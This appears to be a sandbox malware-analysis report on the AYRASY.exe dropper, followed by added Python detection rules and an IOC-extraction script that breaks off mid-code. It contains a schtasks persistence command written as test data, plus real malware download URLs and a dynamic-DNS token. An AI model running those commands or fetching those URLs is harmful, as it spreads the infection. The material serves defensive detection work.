                                Source: C:\Users\user\Desktop\AYRASY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001940DA GetSystemTimeAsFileTime,__aulldiv,2_2_001940DA
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001EC146 GetUserNameW,2_2_001EC146
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001A2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_001A2C3C
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0018E47B
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                Source: Amcache.hve.17.drBinary or memory string: msmpeng.exe
                                Source: Amcache.hve.17.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3412593994.0000000001446000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: Amcache.hve.17.drBinary or memory string: MsMpEng.exe
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                                Stealing of Sensitive Information

                                Source: Yara match | File source: Process Memory Space: ._cache_AYRASY.exe PID: 6564, type: MEMORYSTR
                                Source: Yara match | File source: dump.pcap, type: PCAP
                                Source: Yara match | File source: AYRASY.exe, type: SAMPLE
                                Source: Yara match | File source: 0.0.AYRASY.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara match | File source: Process Memory Space: AYRASY.exe PID: 6600, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: Synaptics.exe PID: 5048, type: MEMORYSTR
                                Source: Yara match | File source: C:\ProgramData\Synaptics\RCX4413.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1, type: DROPPED
                                Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: YOABSG.exe, 00000016.00000002.3316449153.0000000000A5E000.00000040.00000001.01000000.00000009.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                                Source: YOABSG.exe, 00000015.00000003.2703406856.0000000004905000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81
                                Source: YOABSG.exe | Binary or memory string: WIN_XP
                                Source: YOABSG.exe, 00000014.00000003.2518038035.0000000004762000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81'
                                Source: YOABSG.exe | Binary or memory string: WIN_XPe
                                Source: YOABSG.exe, 00000009.00000003.2215831235.000000000434D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_813
                                Source: YOABSG.exe, 00000012.00000003.2437148887.0000000004933000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_818)
                                Source: YOABSG.exe | Binary or memory string: WIN_VISTA
                                Source: YOABSG.exe | Binary or memory string: WIN_7
                                Source: YOABSG.exe | Binary or memory string: WIN_8
                                Source: YOABSG.exe, 0000000C.00000003.2277128270.00000000047AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81x
                                Source: YOABSG.exe, 00000016.00000002.3320822835.000000000473F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIN_81T
                                Source: Yara match | File source: Process Memory Space: ._cache_AYRASY.exe PID: 6564, type: MEMORYSTR

                                Remote Access Functionality

                                Source: Yara match | File source: Process Memory Space: ._cache_AYRASY.exe PID: 6564, type: MEMORYSTR
                                Source: Yara match | File source: dump.pcap, type: PCAP
                                Source: Yara match | File source: AYRASY.exe, type: SAMPLE
                                Source: Yara match | File source: 0.0.AYRASY.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 00000003.00000003.2300553454.0000000000750000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000000.00000000.2139635258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara match | File source: Process Memory Space: AYRASY.exe PID: 6600, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: Synaptics.exe PID: 5048, type: MEMORYSTR
                                Source: Yara match | File source: C:\ProgramData\Synaptics\RCX4413.tmp, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1, type: DROPPED
                                Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001C91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_001C91DC
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001C96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_001C96E2
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A091DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_00A091DC
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A096E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_00A096E2
                                ATT&CK matrix, tactic columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information421
                                Scripting
                                2
                                Valid Accounts
                                11
                                Windows Management Instrumentation
                                421
                                Scripting
                                1
                                Exploitation for Privilege Escalation
                                1
                                Disable or Modify Tools
                                21
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                4
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomains1
                                Replication Through Removable Media
                                2
                                Native API
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory1
                                Peripheral Device Discovery
                                Remote Desktop Protocol21
                                Input Capture
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                1
                                Extra Window Memory Injection
                                21
                                Obfuscated Files or Information
                                Security Account Manager1
                                Account Discovery
                                SMB/Windows Admin Shares3
                                Clipboard Data
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                1
                                Software Packing
                                NTDS4
                                File and Directory Discovery
                                Distributed Component Object ModelInput Capture34
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd21
                                Registry Run Keys / Startup Folder
                                21
                                Access Token Manipulation
                                1
                                DLL Side-Loading
                                LSA Secrets38
                                System Information Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                                Process Injection
                                1
                                Extra Window Memory Injection
                                Cached Domain Credentials271
                                Security Software Discovery
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job
                                12
                                Masquerading
                                DCSync131
                                Virtualization/Sandbox Evasion
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                                Registry Run Keys / Startup Folder
                                2
                                Valid Accounts
                                Proc Filesystem3
                                Process Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt131
                                Virtualization/Sandbox Evasion
                                /etc/passwd and /etc/shadow11
                                Application Window Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                Access Token Manipulation
                                Network Sniffing1
                                System Owner/User Discovery
                                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                                Process Injection
                                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Behavior Graph (ID 1582334, sample AYRASY.exe, start date 30/12/2024, architecture WINDOWS, score 100)

Contacted domains/IPs at the root: freedns.afraid.org, xred.mooo.com, 2 other IPs or domains
Root signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 18 other signatures; Uses dynamic DNS services (attached to freedns.afraid.org)

Process tree (numbers in parentheses are the graph's created-registry-value / created-file counts where it shows them):
- AYRASY.exe (1 / 6)
    dropped: C:\Users\user\Desktop\._cache_AYRASY.exe (PE32); C:\ProgramData\Synaptics\Synaptics.exe (PE32); C:\ProgramData\Synaptics\RCX4413.tmp (PE32); C:\...\Synaptics.exe:Zone.Identifier (ASCII)
    - ._cache_AYRASY.exe (2 / 5)
        network: 172.111.138.100, ports 49759, 49850, 49923 (VOXILITYGB, United States)
        dropped: C:\Users\user\AppData\Roaming\...\YOABSG.exe (PE32); C:\Users\user\AppData\Local\Temp\WBHUSK.vbs (ASCII)
        signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
        - cmd.exe (1)
            signature: Uses schtasks.exe or at.exe to add and modify task schedules
            - conhost.exe
            - schtasks.exe
        - wscript.exe
            signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
    - Synaptics.exe (30)
        network: docs.google.com 142.250.186.46, ports 443, 49785, 49786 (GOOGLEUS, United States); drive.usercontent.google.com 172.217.23.97, ports 443, 49804, 49805 (GOOGLEUS, United States); freedns.afraid.org 69.42.215.252, ports 49796, 80 (AWKNET-LLCUS, United States)
        dropped: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1 (PE32)
        signatures: Antivirus detection for dropped file; Drops PE files to the document folder of the user
        - WerFault.exe
- YOABSG.exe
    signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Found API chain indicative of sandbox detection
- EXCEL.EXE (219 / 68)
- 6 other processes
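The chain in the behavior graph above (a binary on the Desktop writes a .vbs to Temp and a second PE to AppData\Roaming, then launches wscript.exe on the script and cmd.exe, which in turn runs schtasks.exe against the AppData copy) is exactly what host detection should key on. The block below is an added example, not Joe Sandbox output: it runs three small rules over constructed Sysmon-style process-creation events that model the graph, plus two benign controls. Field names, the ProcessGuid values and the schtasks switches are assumptions; the report only records the task name and its target path.

```python
import re

# Directories an unprivileged user can write to. A script argument, a task
# target or an ancestor image under one of these is what the rules key on.
USER_WRITABLE = re.compile(
    r"\\(AppData\\Local\\Temp|AppData\\Roaming|ProgramData|Users\\Public|Desktop|Downloads)\\",
    re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh)\b", re.IGNORECASE)
TASK_TARGET = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)

# Constructed events (not sandbox output): explorer -> AYRASY.exe ->
# ._cache_AYRASY.exe -> {wscript.exe WBHUSK.vbs, cmd.exe -> schtasks.exe},
# followed by two benign controls. Guids and the schtasks switches are invented.
EVENTS = [
    {"Guid": 1, "ParentGuid": 0, "Image": r"C:\Users\user\Desktop\AYRASY.exe",
     "CommandLine": r'"C:\Users\user\Desktop\AYRASY.exe"'},
    {"Guid": 2, "ParentGuid": 1, "Image": r"C:\Users\user\Desktop\._cache_AYRASY.exe",
     "CommandLine": r'"C:\Users\user\Desktop\._cache_AYRASY.exe"'},
    {"Guid": 3, "ParentGuid": 2, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\WBHUSK.vbs"'},
    {"Guid": 4, "ParentGuid": 2, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c schtasks /create /f /tn WBHUSK.exe /tr "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe" /sc minute /mo 1'},
    {"Guid": 5, "ParentGuid": 4, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /f /tn WBHUSK.exe /tr "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe" /sc minute /mo 1'},
    # Benign controls: a logon script under Program Files and a task query.
    {"Guid": 6, "ParentGuid": 0, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Program Files\Vendor\logon.vbs"'},
    {"Guid": 7, "ParentGuid": 0, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /query /tn "\Microsoft\Windows\Defrag\ScheduledDefrag"'},
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_script_from_writable(ev):
    """Script host running a script that lives in a user-writable directory."""
    cl = ev["CommandLine"]
    return (image_name(ev["Image"]) in SCRIPT_HOSTS
            and SCRIPT_EXT.search(cl) is not None
            and USER_WRITABLE.search(cl) is not None)


def rule_task_to_writable(ev):
    """schtasks /create whose /tr target sits in a user-writable directory."""
    cl = ev["CommandLine"]
    if image_name(ev["Image"]) != "schtasks.exe" or "/create" not in cl.lower():
        return False
    m = TASK_TARGET.search(cl)
    target = (m.group(1) or m.group(2)) if m else ""
    return USER_WRITABLE.search(target) is not None


def ancestor_in_writable(ev, by_guid, max_depth=8):
    """Walk ParentGuid links; True if any ancestor image is in a user-writable dir."""
    seen, cur = set(), by_guid.get(ev["ParentGuid"])
    while cur and cur["Guid"] not in seen and len(seen) < max_depth:
        if USER_WRITABLE.search(cur["Image"]):
            return True
        seen.add(cur["Guid"])
        cur = by_guid.get(cur["ParentGuid"])
    return False


def detect(events):
    """Return (Guid, rule name) pairs for every event that trips a rule."""
    by_guid = {e["Guid"]: e for e in events}
    findings = []
    for ev in events:
        hits = []
        if rule_script_from_writable(ev):
            hits.append("script_from_user_writable_dir")
        if rule_task_to_writable(ev):
            hits.append("schtasks_create_user_writable_target")
        # Lineage only escalates an existing hit: plenty of legitimate
        # installers run from Desktop or Downloads and spawn cmd.exe.
        if hits and ancestor_in_writable(ev, by_guid):
            hits.append("spawned_by_binary_in_user_writable_dir")
        findings.extend((ev["Guid"], h) for h in hits)
    return findings


if __name__ == "__main__":
    for guid, rule in detect(EVENTS):
        print(guid, rule)
```

The lineage rule is deliberately a modifier rather than a detection of its own; on real telemetry the schtasks command line is what you pivot on, and the parent chain back to a Desktop or Temp binary is what separates this dropper from an administrator scripting a task.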

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
AYRASY.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics
AYRASY.exe | 87% | Virustotal | -
AYRASY.exe | 100% | Avira | TR/Dldr.Agent.SH
AYRASY.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
AYRASY.exe | 100% | Joe Sandbox ML | -

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\WBHUSK.vbs | 100% | Avira | VBS/Runner.VPJI
C:\ProgramData\Synaptics\RCX4413.tmp | 100% | Avira | TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCX4413.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\Documents\GAOBCVIQIJ\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH
C:\Users\user\Documents\GAOBCVIQIJ\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\Desktop\._cache_AYRASY.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | 100% | Joe Sandbox ML | -
C:\ProgramData\Synaptics\RCX4413.tmp | 100% | Joe Sandbox ML | -
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | -
C:\Users\user\Documents\GAOBCVIQIJ\~$cache1 | 100% | Joe Sandbox ML | -
C:\ProgramData\Synaptics\RCX4413.tmp | 100% | ReversingLabs | Win32.Worm.Zorex
C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics
C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | 47% | ReversingLabs | Win32.Trojan.Lisk
C:\Users\user\Desktop\._cache_AYRASY.exe | 47% | ReversingLabs | Win32.Trojan.Lisk
C:\Users\user\Documents\GAOBCVIQIJ\~$cache1 | 100% | ReversingLabs | Win32.Worm.Zorex

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://xred.site50.net/syn/SUpdate.ini0. | 100% | Avira URL Cloud | malware
https://drive.userconten | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SSLLibrary.dl8 | 100% | Avira URL Cloud | malware

Note on the URL rows: these three strings are memory scrapes. "SUpdate.ini0." and "SSLLibrary.dl8" carry trailing bytes from adjacent memory, and "https://drive.userconten" is truncated. Their clean forms (http://xred.site50.net/syn/SUpdate.ini, http://xred.site50.net/syn/SSLLibrary.dll, https://drive.usercontent.google.com/) appear in the URL list further down; use those, not the scraped variants, when building indicators.
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false | - | high
docs.google.com | 142.250.186.46 | true | false | - | high
drive.usercontent.google.com | 172.217.23.97 | true | false | - | high
xred.mooo.com | unknown | unknown | false | - | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
xred.mooo.com | false | - | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | - | high
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978;X | Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl= | AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://xred.site50.net/syn/SUpdate.ini0. | AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://xred.site50.net/syn/Synaptics.rarZ | Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1 | AYRASY.exe | false | - | high
https://docs.google.com/8 | Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://docs.google.com/ty | Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1: | Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://drive.userconten | Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.2441515499.0000000005597000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.usercontent.google.com/ | Synaptics.exe, 00000003.00000003.2357080869.0000000005535000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.2441515499.0000000005520000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://upx.sf.net | Amcache.hve.17.dr | false | - | high
http://xred.site50.net/syn/Synaptics.rar | AYRASY.exe | false | - | high
http://ip-score.com/checkip/ | ._cache_AYRASY.exe, 00000002.00000002.3416162659.00000000046DE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://docs.google.com/ | Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.2441515499.000000000556D000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000003.2356235775.00000000007AA000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.2436766309.000000000072B000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.2436766309.00000000007B2000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://docs.google.com/google.com/ | Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://xred.site50.net/syn/SSLLibrary.dll6 | Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1: | Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1 | AYRASY.exe | false | - | high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1 | ~DFF3ADC856E5C0AEBE.TMP.4.dr | false | - | high
https://docs.google.com/oogle-analytics.com | Synaptics.exe, 00000003.00000002.2441515499.0000000005618000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://xred.site50.net/syn/SSLLibrary.dl8 | AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docs.google.com/uc?id=0BxsMX | Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlL | AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://docs.google.com/neer | Synaptics.exe, 00000003.00000003.2356852883.00000000055CC000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVG | Synaptics.exe, 00000003.00000003.2356852883.000000000558B000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://xred.site50.net/syn/SUpdate.iniZ | Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://xred.site50.net/syn/SUpdate.ini | AYRASY.exe | false | - | high
https://docs.google.com/der | Synaptics.exe, 00000003.00000002.2441515499.000000000557F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16 | Synaptics.exe, 00000003.00000002.2438067396.0000000002190000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978l | AYRASY.exe, 00000000.00000003.2148237469.00000000022E0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://docs.google.com/uc?id=0; | Synaptics.exe, 00000003.00000002.2455890398.00000000083BE000.00000004.00000010.00020000.00000000.sdmp; Synaptics.exe, 00000003.00000002.2444140781.000000000617E000.00000004.00000010.00020000.00000000.sdmp | false | - | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc6135629787 | Synaptics.exe, 00000003.00000002.2436766309.000000000072B000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://xred.site50.net/syn/SSLLibrary.dll | AYRASY.exe | false | - | high
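The URL list above mixes three kinds of string: actor-controlled hosts (xred.site50.net, the ip-score.com check), shared services where only the object is the actor's (the three Dropbox share tokens, one Google Drive file id, and the freedns.afraid.org API call whose sha parameter is an account-specific token), and scrape noise (truncations such as "https://drive.userconten", overruns such as "SSLLibrary.dl8", and the UPX stub string http://upx.sf.net that came out of Amcache). Blocking docs.google.com or freedns.afraid.org outright is not an option, so the useful indicator for those is the object id. The block below is an added example, not part of the report, that turns a constructed subset of the strings above into a blocklist keyed on the stable part of each URL; the family names and id formats are my assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed subset of the report's "URLs from Memory and Binaries" strings,
# deliberately including the truncated and overrun variants.
SCRAPED = [
    "http://xred.site50.net/syn/SUpdate.ini0.",
    "http://xred.site50.net/syn/SUpdate.ini",
    "http://xred.site50.net/syn/SSLLibrary.dl8",
    "http://xred.site50.net/syn/SSLLibrary.dll",
    "http://xred.site50.net/syn/Synaptics.rarZ",
    "http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978;X",
    "http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978",
    "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:",
    "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=",
    "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlL",
    "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1",
    "https://docs.google.com/uc?id=0BxsMX",
    "https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVG",
    "https://drive.usercontent.google.com/",
    "https://docs.google.com/8",
    "https://docs.google.com/oogle-analytics.com",
    "https://drive.userconten",
    "http://upx.sf.net",
    "http://ip-score.com/checkip/",
]


# Per-service extractors return the stable object id or None. Each regex is
# anchored at the start of the value so trailing scrape bytes are cut off.
def dropbox_id(u):
    m = re.match(r"/s/([a-z0-9]+)/", u.path)
    return m.group(1) if m else None


def gdrive_id(u):
    m = re.match(r"[A-Za-z0-9_-]+", parse_qs(u.query).get("id", [""])[0])
    return m.group(0) if m else None


def afraid_key(u):
    # The API v1 sha parameter is a 40-hex account token (assumption).
    m = re.match(r"[0-9a-f]{40}", parse_qs(u.query).get("sha", [""])[0])
    return m.group(0) if m else None


FAMILIES = {  # shared hosts: never block the host, key on the object
    "www.dropbox.com": ("dropbox", dropbox_id),
    "docs.google.com": ("gdrive", gdrive_id),
    "drive.google.com": ("gdrive", gdrive_id),
    "drive.usercontent.google.com": ("gdrive", gdrive_id),
    "freedns.afraid.org": ("afraid_dyndns", afraid_key),
}
PACKER_STRINGS = {"upx.sf.net"}  # library/packer artefacts, not C2


def extract(strings):
    """Split scraped URL strings into host indicators, object indicators and noise."""
    uniq = set(strings)
    hosts, objects, noise = set(), set(), []
    for s in sorted(uniq):
        # A string that is a strict prefix of another scraped string is a
        # truncation; the longer sibling carries everything it does.
        if any(o != s and o.startswith(s) for o in uniq):
            noise.append((s, "truncated prefix of a longer string"))
            continue
        u = urlsplit(s)
        host = u.hostname or ""
        if host in PACKER_STRINGS:
            noise.append((s, "packer/library string, not C2"))
        elif host in FAMILIES:
            family, getter = FAMILIES[host]
            oid = getter(u)
            if oid:
                objects.add((family, oid))
            else:
                noise.append((s, "shared host without object id"))
        elif "." in host:
            hosts.add(host)  # overrun bytes in the path do not matter here
        else:
            noise.append((s, "unparseable"))
    # Truncated object ids: drop an id that is a strict prefix of another
    # id in the same family (0BxsMX vs 0BxsMXGfPIZfSVlVsOGlEVG).
    objects = {(f, i) for f, i in objects
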